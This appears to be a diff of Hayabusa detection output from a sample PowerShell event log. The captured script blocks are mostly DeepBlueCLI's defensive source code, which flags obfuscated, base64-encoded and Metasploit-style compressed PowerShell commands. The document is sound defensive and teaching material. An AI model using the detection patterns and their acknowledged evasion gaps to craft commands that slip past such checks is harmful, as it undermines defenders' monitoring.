$string } . Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:47:01.705 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"$text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:47:01.708 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ # The path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:47:01.714 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:47:01.717 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:47:15.018 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:47:15.018 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:47:15.019 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:47:15.019 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:47:15.910 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:49:18.979 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:49:18.983 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue <at> backshore <dot> net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) #if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ # The path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } #} } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" 